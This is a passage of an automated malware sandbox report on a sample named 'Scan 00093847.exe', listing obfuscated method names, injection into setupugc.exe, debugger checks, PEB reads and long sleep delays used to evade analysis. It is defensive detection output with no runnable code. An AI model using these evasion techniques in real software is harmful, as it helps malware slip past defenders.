            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03267594 push DD2CA9E8h; retf 9_2_0326759A
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03270400 push ds; retf 9_2_03270403
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_032624EA push ebx; retf 9_2_032624EB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03264AD2 push ds; ret 9_2_03264AD4
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0326D8B8 push edi; iretd 9_2_0326D8BA
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_032578E0 push esi; ret 9_2_032578E1
            Source: Scan 00093847.exeStatic PE information: section name: .text entropy: 7.912332332178285
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, x75rPZrJVaknhWeD2F.csHigh entropy of concatenated method names: 'xOjY5FSPhe', 'OThYD7m6xG', 'hHpr1jHCcu', 'qh8raHPrUd', 'FlTr7uFcyu', 'g5DrXSx16S', 'CpCrAFCPoJ', 'dVNrxvZ8mZ', 'po8rFwGYnY', 'CeWrKgdpuA'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, EWps5XsJN6X79AaxK1.csHigh entropy of concatenated method names: 'Dispose', 'm3lsB8oD1f', 'VKjhGkRfNJ', 'kxRNNCqu2y', 'Cu8spyHhCb', 'zTGszUMnAm', 'ProcessDialogKey', 'gwBhwZiCiA', 'SO5hsULl3r', 'DJVhhPTZBB'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, CDQdkfwKkBl51cZ9q9b.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xbBoQFb7jV', 'ilXobt0egf', 'wlxom3PSIV', 'WFeofGuoVF', 'Y3TotH35bH', 'bWSonVLL0k', 'dZTo0SRXHv'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, yCd6TKQ6QdRmG1No7E.csHigh entropy of concatenated method names: 'zkeuQo84Ky', 'a39ublOT0e', 'B3rumw1uk8', 'M02ufdRFx3', 'dS3utxIrVs', 'VKNunQVnQK', 'Buqu0gXjht', 'uw0uHyByfC', 'iO5uB72xdG', 'stRuprnl2n'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, xbnwQMEvInGHMtrNdY.csHigh entropy of concatenated method names: 'wWf9qGdywV', 'bxi9u3n8xh', 'fV99rrUlso', 'C2w9YSuC59', 'YPi9vudI16', 'D549Cn98vJ', 'uc99OaWpuZ', 'T7s98eVuR3', 'utv9dZElmo', 'Cky9U4eai4'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, fq78X2c3Qq0OHQr1qO.csHigh entropy of concatenated method names: 'pc8rE7n6K6', 'DyprjmE0r7', 'JXkrcs4jop', 'Gofr2lSusM', 'ba0rga8IEe', 'qxWryj0wVy', 'AIWrRXjCs6', 'dAor9dsJ6a', 'x4srItvVCG', 'wJAro8Pkj4'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, IdwSeWBNwmgh8U2Fju.csHigh entropy of concatenated method names: 'cJMic5aXUS', 'bpDi2bYSQI', 'KFwiTycZOO', 'THJiGei2a7', 'w3hiaui62g', 'J3Ki7Kyutf', 'SbliAMSlb7', 'iNbix141MU', 'V4AiKPyWJZ', 'kRQiWIlvNW'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, BwIRkvPKU89DxkYm9a.csHigh entropy of concatenated method names: 'wbAIsDvZV4', 'bwtILrVKts', 'c4GIZj7xjq', 'JEYIqZjBsm', 'HXDIu30Wvr', 'bZAIYBZJH3', 'cWeIvrZJj8', 'sjt90TeDlZ', 'kaU9HuWHk4', 'lC39BlLbR4'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, XhAFAamr0tWlcVBdxt.csHigh entropy of concatenated method names: 'VcQRdGHvD1', 'DbRRUWRSoQ', 'ToString', 'frnRqUGaUs', 'kRNRuo2LB3', 'd0LRrX1xKY', 'uLXRYTCdBZ', 'HQoRvadIgD', 'PGZRCIZq4j', 'H4vROdYylA'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, S8ZbYw8Fi1k4FC25jC.csHigh entropy of concatenated method names: 'XPY9TmUhEd', 'L0m9GhqlRq', 'iVX91CxUDR', 'ofY9a24UuH', 'bsI9QCwVc0', 'Hi797FZCRE', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, TyYPmlqpDhfKEJ8WuW.csHigh entropy of concatenated method names: 'a8SgKomQjU', 'F1Mg6JmZ3x', 'RF5gQhUb3u', 'l68gb6HL5F', 'C2YgGFKURw', 'SUvg1jObVb', 'I4OgaJ4UpO', 'UMfg7DgATs', 'K65gXUnDQ2', 'NeagA4Aq6j'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, XOj1J7zjRbZLE3UVuq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wLxIiEkFhk', 'I2OIg9N2Hu', 'fZ8Iycb9nl', 'lYxIRbSOVt', 'PHOI9dMbLx', 'usUIIWWxft', 'K6bIoxgoxL'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, QWn8omgnahOufuxoIN.csHigh entropy of concatenated method names: 'a4ARHsa7td', 'Fo4RpfwGx5', 'Kbc9wYdqMx', 'j8y9slWNUW', 'yvSRWaUUyI', 'bbQR6euLEI', 'iJYRVWaMrb', 'P7lRQ8bvFS', 'K9WRbDaOiy', 'U0oRm9VEZT'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, w77h6TwuZ18DcKUfpl4.csHigh entropy of concatenated method names: 'yLGIMj7Tql', 'sVyIlMmLF4', 'YbjI3RhnyH', 'KDHIEcYuIP', 'eB8I5BK66y', 'V5eIjbRScD', 'OWGIDqrJle', 'IoqIcruFq4', 'qsPI2MmHNh', 'gd7IeD1NCK'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, QVRjQq3x3ioEZ2IDHG.csHigh entropy of concatenated method names: 'gussC7Ehrw', 'gwgsOLD5RN', 'wPUsdUoAZl', 'ILXsUZs0TR', 'zAxsgMFQXZ', 'dKnsyos8hM', 'b73DiPj7YM6evr0GXf', 'XlpO0T4IpPtiFEMR7L', 'zVyssZKZ2p', 'U3esLReS9C'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, UkQjbuFFqg3jhaMZxt.csHigh entropy of concatenated method names: 'LS9vShhXtV', 'iuPvupag19', 'pESvYBmGed', 'WoBvCJmwIt', 'SRqvOiiLeH', 'lJEYtCTfoe', 'yLPYn4m6NC', 'HIoY0C7cUW', 'nWgYHPyFHp', 'bwSYBkO5Um'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, TnkgYbd3tme2aO7aiW.csHigh entropy of concatenated method names: 'r34LS847gO', 'H2KLqXqK00', 'i6iLu3VTtW', 'aKtLrJjXTP', 'lDILYxTgr4', 'kQMLvlFxdy', 'rJPLCq64eu', 'IUJLOMi47n', 'q0BL8wvpTa', 'oMHLdKMJx6'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, YgRgb5I2oAelbEfpAx.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'B0lhBTgWPt', 'SMlhpe0byO', 'aM0hzQmIJW', 'wFTLw46qpH', 'UifLslESh4', 'QBDLhOGcAD', 'wnaLLVWSh3', 'loMXDGehAaUByGpjkV2'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, DvMJcLbtywNmiZ3ATB.csHigh entropy of concatenated method names: 'GAk3TEXQv', 'oYIElZifm', 'fQYjfjAqH', 'BwEDBy53P', 'eY32k2vVd', 'T8neGCB0N', 'pJ71vlXd2FcSTLj0nR', 'Ednosq9eterdcCvKME', 'A8H9uF94O', 'm4coaCHpS'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, q52Od2n9oSNdoIQjeK.csHigh entropy of concatenated method names: 'EWDCq91ujJ', 'aLYCrV8MVM', 'qPXCvscdjC', 'GXwvpeRXFa', 'bIPvzv4MsC', 'AYrCwmPGNy', 'eygCsixsW6', 'CFSCheNCmm', 'zW1CLsxOMn', 'cGLCZBl48S'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, Q1i50DNGqTQOwewitq.csHigh entropy of concatenated method names: 'b5VCM6vpcY', 'q7VClhpaHt', 'aYMC36co4y', 'HErCEU5gXh', 'h4mC5hrQKJ', 'RTwCjuKoYT', 'H0PCDfnDux', 'yyWCcoBKHu', 'OH1C2v9YcQ', 'I0GCeqYeXi'

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: Yara matchFile source: Process Memory Space: Scan 00093847.exe PID: 5480, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\Scan 00093847.exeMemory allocated: 13F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeMemory allocated: 3020000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeMemory allocated: 2E30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeMemory allocated: 8150000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeMemory allocated: 9150000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeMemory allocated: 9310000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeMemory allocated: A310000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FD1C0 rdtsc 3_2_010FD1C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5411Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 931Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeWindow / User API: threadDelayed 9834Jump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\setupugc.exeAPI coverage: 2.7 %
            Source: C:\Users\user\Desktop\Scan 00093847.exe TID: 6528Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5808Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7052Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 5812Thread sleep count: 139 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 5812Thread sleep time: -278000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 5812Thread sleep count: 9834 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 5812Thread sleep time: -19668000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe TID: 764Thread sleep time: -50000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe TID: 764Thread sleep time: -34500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0326C520 FindFirstFileW,FindNextFileW,FindClose,9_2_0326C520
            Source: uspEUeZyrqFDmi.exe, 0000000B.00000002.3553310155.0000000000C4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
            Source: setupugc.exe, 00000009.00000002.3552722555.0000000003595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 0000000C.00000002.2362899484.000002139BE6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllVV
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_00417733 LdrLoadDll,3_2_00417733
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01140115 mov eax, dword ptr fs:[00000030h]3_2_01140115
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112A118 mov ecx, dword ptr fs:[00000030h]3_2_0112A118
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112A118 mov eax, dword ptr fs:[00000030h]3_2_0112A118
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B0124 mov eax, dword ptr fs:[00000030h]3_2_010B0124
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107B136 mov eax, dword ptr fs:[00000030h]3_2_0107B136
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01081131 mov eax, dword ptr fs:[00000030h]3_2_01081131
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01155152 mov eax, dword ptr fs:[00000030h]3_2_01155152
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01079148 mov eax, dword ptr fs:[00000030h]3_2_01079148
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107C156 mov eax, dword ptr fs:[00000030h]3_2_0107C156
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01114144 mov eax, dword ptr fs:[00000030h]3_2_01114144
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01114144 mov ecx, dword ptr fs:[00000030h]3_2_01114144
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01087152 mov eax, dword ptr fs:[00000030h]3_2_01087152
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01086154 mov eax, dword ptr fs:[00000030h]3_2_01086154
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01119179 mov eax, dword ptr fs:[00000030h]3_2_01119179
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107F172 mov eax, dword ptr fs:[00000030h]3_2_0107F172
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C0185 mov eax, dword ptr fs:[00000030h]3_2_010C0185
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110019F mov eax, dword ptr fs:[00000030h]3_2_0110019F
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107A197 mov eax, dword ptr fs:[00000030h]3_2_0107A197
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113C188 mov eax, dword ptr fs:[00000030h]3_2_0113C188
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010D7190 mov eax, dword ptr fs:[00000030h]3_2_010D7190
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011311A4 mov eax, dword ptr fs:[00000030h]3_2_011311A4
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109B1B0 mov eax, dword ptr fs:[00000030h]3_2_0109B1B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011461C3 mov eax, dword ptr fs:[00000030h]3_2_011461C3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BD1D0 mov eax, dword ptr fs:[00000030h]3_2_010BD1D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BD1D0 mov ecx, dword ptr fs:[00000030h]3_2_010BD1D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011551CB mov eax, dword ptr fs:[00000030h]3_2_011551CB
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FE1D0 mov eax, dword ptr fs:[00000030h]3_2_010FE1D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FE1D0 mov ecx, dword ptr fs:[00000030h]3_2_010FE1D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A51EF mov eax, dword ptr fs:[00000030h]3_2_010A51EF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010851ED mov eax, dword ptr fs:[00000030h]3_2_010851ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011271F9 mov esi, dword ptr fs:[00000030h]3_2_011271F9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011561E5 mov eax, dword ptr fs:[00000030h]3_2_011561E5
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B01F8 mov eax, dword ptr fs:[00000030h]3_2_010B01F8
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01104000 mov ecx, dword ptr fs:[00000030h]3_2_01104000
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109E016 mov eax, dword ptr fs:[00000030h]3_2_0109E016
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107A020 mov eax, dword ptr fs:[00000030h]3_2_0107A020
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107C020 mov eax, dword ptr fs:[00000030h]3_2_0107C020
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114903E mov eax, dword ptr fs:[00000030h]3_2_0114903E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112705E mov ebx, dword ptr fs:[00000030h]3_2_0112705E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112705E mov eax, dword ptr fs:[00000030h]3_2_0112705E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01082050 mov eax, dword ptr fs:[00000030h]3_2_01082050
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AB052 mov eax, dword ptr fs:[00000030h]3_2_010AB052
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01155060 mov eax, dword ptr fs:[00000030h]3_2_01155060
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov ecx, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01091070 mov eax, dword ptr fs:[00000030h]3_2_01091070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AC073 mov eax, dword ptr fs:[00000030h]3_2_010AC073
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110106E mov eax, dword ptr fs:[00000030h]3_2_0110106E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FD070 mov ecx, dword ptr fs:[00000030h]3_2_010FD070
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108208A mov eax, dword ptr fs:[00000030h]3_2_0108208A
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107D08D mov eax, dword ptr fs:[00000030h]3_2_0107D08D
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B909C mov eax, dword ptr fs:[00000030h]3_2_010B909C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AD090 mov eax, dword ptr fs:[00000030h]3_2_010AD090
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AD090 mov eax, dword ptr fs:[00000030h]3_2_010AD090
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01085096 mov eax, dword ptr fs:[00000030h]3_2_01085096
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011460B8 mov eax, dword ptr fs:[00000030h]3_2_011460B8
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011460B8 mov ecx, dword ptr fs:[00000030h]3_2_011460B8
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov ecx, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov ecx, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov ecx, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov ecx, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010970C0 mov eax, dword ptr fs:[00000030h]3_2_010970C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011550D9 mov eax, dword ptr fs:[00000030h]3_2_011550D9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011020DE mov eax, dword ptr fs:[00000030h]3_2_011020DE
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FD0C0 mov eax, dword ptr fs:[00000030h]3_2_010FD0C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FD0C0 mov eax, dword ptr fs:[00000030h]3_2_010FD0C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A90DB mov eax, dword ptr fs:[00000030h]3_2_010A90DB
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010880E9 mov eax, dword ptr fs:[00000030h]3_2_010880E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0107A0E3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A50E4 mov eax, dword ptr fs:[00000030h]3_2_010A50E4
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A50E4 mov ecx, dword ptr fs:[00000030h]3_2_010A50E4
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107C0F0 mov eax, dword ptr fs:[00000030h]3_2_0107C0F0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C20F0 mov ecx, dword ptr fs:[00000030h]3_2_010C20F0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BA30B mov eax, dword ptr fs:[00000030h]3_2_010BA30B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BA30B mov eax, dword ptr fs:[00000030h]3_2_010BA30B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BA30B mov eax, dword ptr fs:[00000030h]3_2_010BA30B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107C310 mov ecx, dword ptr fs:[00000030h]3_2_0107C310
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A0310 mov ecx, dword ptr fs:[00000030h]3_2_010A0310
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110930B mov eax, dword ptr fs:[00000030h]3_2_0110930B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110930B mov eax, dword ptr fs:[00000030h]3_2_0110930B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110930B mov eax, dword ptr fs:[00000030h]3_2_0110930B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AF32A mov eax, dword ptr fs:[00000030h]3_2_010AF32A
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01077330 mov eax, dword ptr fs:[00000030h]3_2_01077330
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114132D mov eax, dword ptr fs:[00000030h]3_2_0114132D
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114132D mov eax, dword ptr fs:[00000030h]3_2_0114132D
